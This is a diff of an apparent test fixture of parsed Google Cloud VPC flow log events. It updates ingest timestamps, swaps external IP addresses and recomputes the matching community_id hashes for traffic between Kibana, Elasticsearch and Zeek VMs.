@@ -23097,8 +23097,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869251300Z",
- "original": "{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392456800Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373ek\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34536,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:51.050074134Z", "end": "2019-06-14T03:47:51.162931667Z", @@ -23125,18 +23125,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 137855, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 72 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:1JiVoUP9ZCGJx3vJg7cg+GheZ8o=", + "community_id": "1:9Sajzk9Kjby8Y6aALULEYfH3nYY=", "bytes": 137855, "name": "default", "transport": "tcp", @@ -23158,7 +23158,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -23195,8 +23195,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869253900Z",
- "original": "{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392462700Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373fj\",\"jsonPayload\":{\"bytes_sent\":\"137855\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"72\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466742414Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466742414Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -23223,18 +23223,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 125197, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VI3r5tULP+rnInZrp9gsYAw2kGA=", + "community_id": "1:LgPQaxqGyF5gYr06s0NCzKofgOo=", "bytes": 125197, "name": "default", "transport": "tcp", @@ -23256,7 +23256,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -23293,8 +23293,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.869256500Z",
- "original": "{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}",
+ "ingested": "2021-12-09T13:37:46.392468100Z",
+ "original": 
"{\"insertId\":\"1gq7q7afe373fm\",\"jsonPayload\":{\"bytes_sent\":\"125197\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -23321,18 +23321,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53096, "bytes": 917832, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 230 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:P09xUQegPHVLOJDKriRG0pgrXhE=", + "community_id": "1:p9p1/vwvoKmWznvDynb8S94wSVM=", "bytes": 917832, "name": "default", "transport": "tcp", @@ -23354,7 +23354,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -23391,8 +23391,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869259300Z", - "original": "{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392473600Z", + "original": 
"{\"insertId\":\"1gq7q7afe373eg\",\"jsonPayload\":{\"bytes_sent\":\"917832\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"230\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", "end": "2019-06-14T03:49:56.219496168Z", @@ -23413,10 +23413,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53096, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -23430,7 +23430,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:P09xUQegPHVLOJDKriRG0pgrXhE=", + "community_id": "1:p9p1/vwvoKmWznvDynb8S94wSVM=", "bytes": 55572, "name": "default", "transport": "tcp", @@ -23453,7 +23453,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { 
@@ -23489,8 +23489,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869261900Z", - "original": "{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392479200Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fc\",\"jsonPayload\":{\"bytes_sent\":\"55572\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53096,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.219496168Z\",\"packets_sent\":\"133\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.853096315Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.853096315Z", "end": "2019-06-14T03:49:56.219496168Z", @@ -23517,18 +23517,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33966, "bytes": 4615, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 75 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:JeEMpLpISUoKidiacbnV1gCPvyA=", + "community_id": "1:7RYpCdauzSw7iSF8Ox56BXoCZls=", "bytes": 4615, "name": "default", "transport": "tcp", @@ -23550,7 +23550,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -23587,8 +23587,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869264600Z", - "original": "{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392484800Z", + "original": 
"{\"insertId\":\"1gq7q7afe373eq\",\"jsonPayload\":{\"bytes_sent\":\"4615\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821049800Z\",\"packets_sent\":\"75\",\"reporter\":\"DEST\",\"rtt_msec\":\"0\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510698570Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510698570Z", "end": "2019-06-14T03:49:51.821049800Z", @@ -23611,9 +23611,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65318, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -23627,7 +23627,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GgfFDV/IDDGuMmQ9Zk+/ReCe5Rk=", + "community_id": "1:abTkiqsELuUBAWswX/nZozHWPVo=", "bytes": 75612, "transport": "tcp", "type": "ipv4", @@ -23642,7 +23642,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -23666,8 +23666,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869267400Z", - "original": "{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392490400Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ev\",\"jsonPayload\":{\"bytes_sent\":\"75612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65318,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"583\",\"reporter\":\"SRC\",\"rtt_msec\":\"96\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760345858Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760345858Z", "end": "2019-06-14T03:49:56.220599950Z", @@ -23694,17 +23694,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34536, "bytes": 1461, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:+zMbnpjHTGFzARWUkJuGfy8ryQE=", + "community_id": "1:UvoHbtWzAMEin6FWcQYUnzv4vOQ=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -23718,7 +23718,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -23743,8 +23743,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869270100Z", - "original": "{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392495900Z", + "original": 
"{\"insertId\":\"1gq7q7afe373em\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:51.162931667Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:51.050074134Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:51.050074134Z", "end": "2019-06-14T03:47:51.162931667Z", @@ -23765,9 +23765,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56478, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -23781,7 +23781,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bLZCzhETfwqvL9yQ1jHjTJwKork=", + "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -23796,7 +23796,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
